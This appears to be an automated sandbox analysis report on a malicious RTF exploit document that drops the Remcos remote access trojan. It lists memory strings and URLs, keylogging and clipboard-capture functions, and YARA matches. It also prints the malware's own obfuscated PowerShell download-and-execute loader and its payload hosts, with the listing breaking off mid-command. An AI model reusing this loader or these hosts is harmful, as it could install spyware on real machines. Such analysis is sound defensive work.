Source: EQNEDT32.EXE, 00000002.00000002.352128356.0000000003660000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.60.75/xampp/htm/IEnetworkings.htmlj
Source: EQNEDT32.EXE, 00000002.00000002.351462646.000000000030F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.60.75/xampp/htm/IEnetworkings.htmlrrC:
Source: wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000008.00000002.388425734.0000000004E9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: RegAsm.exe, 0000000C.00000002.865606868.00000000005C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000008.00000002.382499604.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.490903106.00000000027AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.382499604.0000000002791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.379463159.0000000002791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000008.00000002.382499604.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.382499604.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.382499604.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: wscript.exe, 00000005.00000003.353928151.0000000002BC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356453056.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.351462281.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, IEneetworkinglover.vbs.2.dr, IEnetworkings[1].htm.2.dr	String found in binary or memory: https://lesferch.github.io/DesktopPic
Source: powershell.exe, 00000008.00000002.382499604.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000005.00000003.355332766.0000000000890000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355999613.0000000000886000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357613873.0000000000887000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357613873.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/UZOyJ
Source: wscript.exe, 00000005.00000003.355332766.0000000000890000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.357613873.00000000008AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/UZOyJg
Source: wscript.exe, 00000005.00000002.358410005.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355213734.0000000003B67000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354563809.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354650190.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.354592895.0000000003B6E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000008.00000002.382499604.00000000028CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000008.00000002.388370680.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820
Source: wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000005.00000003.356108072.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356871963.000000000091E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.355756558.000000000091E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162

Source: unknown

HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.22:49162 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000

12_2_0040A2B8

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0040B65C OpenClipboard,GetClipboardData,CloseClipboard,

12_2_0040B65C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0041680F OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

12_2_0041680F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0040B65C OpenClipboard,GetClipboardData,CloseClipboard,

12_2_0040B65C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

12_2_0040A3E0

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.467ae68.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.467ae68.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.865606868.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3540, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\notess\logs.dat, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.powershell.exe.467ae68.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.467ae68.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.powershell.exe.467ae68.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.powershell.exe.467ae68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.powershell.exe.467ae68.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 3540, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Very long command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 8742
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 8742			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgID			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDg